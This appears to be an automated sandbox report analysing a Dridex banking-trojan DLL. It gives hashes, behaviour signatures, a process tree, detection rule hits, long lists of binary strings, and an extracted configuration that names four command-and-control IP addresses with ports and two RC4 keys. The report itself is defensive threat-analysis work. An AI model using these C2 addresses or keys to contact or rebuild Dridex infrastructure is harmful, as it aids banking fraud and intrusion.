Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll
Analysis ID:	544195
MD5:	fa496e911b3de4b5888c894f6eeaabe2
SHA1:	eb857722b13f87d0d9e5596105c4b565fb0e6382
SHA256:	05a16b81c00f57c0bf4ec43f50759006fef117093bc68565c97525374223ff4f
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4560 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 1168 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4040 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.300227503.000000006E8E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.261309993.000000006E8E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.259186242.000000006E8E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.rundll32.exe.6e8e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6e8e0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6e8e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6e8e0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1168, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1, ProcessId: 4040

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.loaddll32.exe.6e8e0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	ReversingLabs: Detection: 30%

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.266577739.000000000538E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265851430.000000000538C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265988953.0000000003584000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266857160.0000000003584000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb:Ztk source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.264572264.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265981442.000000000357E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266983327.000000000357E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb9[\|a source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb3 source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb' source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb5 source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb) source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265995916.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266533465.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.265981442.000000000357E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266983327.000000000357E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb] source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.264572264.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb[ source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb? source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.265995916.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266533465.000000000358A000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.265988953.0000000003584000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266857160.0000000003584000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000006.00000003.295038548.00000000052FC000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.297523050.00000000052FC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.261426287.000000006E8FF000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 2.2.rundll32.exe.6e8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6e8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6e8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.300227503.000000006E8E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.261309993.000000006E8E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.259186242.000000006E8E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 700

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8F0730	0_2_6E8F0730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8F9370	0_2_6E8F9370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8E1494	0_2_6E8E1494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8EA4E8	0_2_6E8EA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8E8428	0_2_6E8E8428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8F143C	0_2_6E8F143C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8F2234 NtDelayExecution,		0_2_6E8F2234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E8F2820 NtAllocateVirtualMemory,		0_2_6E8F2820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Virustotal: Detection: 21%
Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	ReversingLabs: Detection: 30%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 700
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4040

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER83A9.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/5

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.266577739.000000000538E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265851430.000000000538C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265988953.0000000003584000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266857160.0000000003584000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb:Ztk source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.264572264.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.265981442.000000000357E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266983327.000000000357E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb9[\|a source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb3 source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb' source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb5 source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb) source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265995916.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266533465.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.26365.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.265981442.000000000357E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266983327.000000000357E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb] source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.264572264.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb[ source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb? source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.265995916.000000000358A000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266533465.000000000358A000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.271988427.00000000056C0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.265988953.0000000003584000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.266857160.0000000003584000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.271996245.00000000056C6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.271945041.00000000056F1000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E8EF6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6E8EF6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
